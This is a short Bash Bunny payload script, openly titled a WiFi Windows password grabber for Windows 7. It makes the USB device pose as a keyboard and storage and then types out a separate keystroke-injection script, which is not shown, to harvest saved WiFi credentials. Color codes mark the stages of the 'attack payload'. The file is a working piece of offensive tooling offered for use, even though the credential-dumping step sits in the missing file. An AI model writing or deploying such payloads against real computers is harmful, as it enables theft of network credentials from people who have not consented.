#!/bin/bash

# @title: WiFi Windows password grabber for the bash bunny
# @author: Silvian Dragan
# @props: Siem, Darren Kitchen
# @version: 1.0
# @target: Windows 7 (not tested for 8 and above)
#
#
# @details: This is a simple Wifi password grabber tested and working for Windows 7
# However this has not been tested on Windows 8 and above and any suggestions and
# improvements are greatly welcomed. Powershell scripting isn't higest skill so
# I'm sure I'll have much to learn.
#
#
# Colors:
#         Purple: starts the attack payload
#         Green: successful execution
#         Red: failure to load dependency ducky script
#


ATTACKMODE HID STORAGE

LED SETUP

GET SWITCH_POSITION

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
        QUACK ${SWITCH_POSITION}/ducky_script.txt
        LED FINISH
else
    LED FAIL
    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
        exit 1
fi
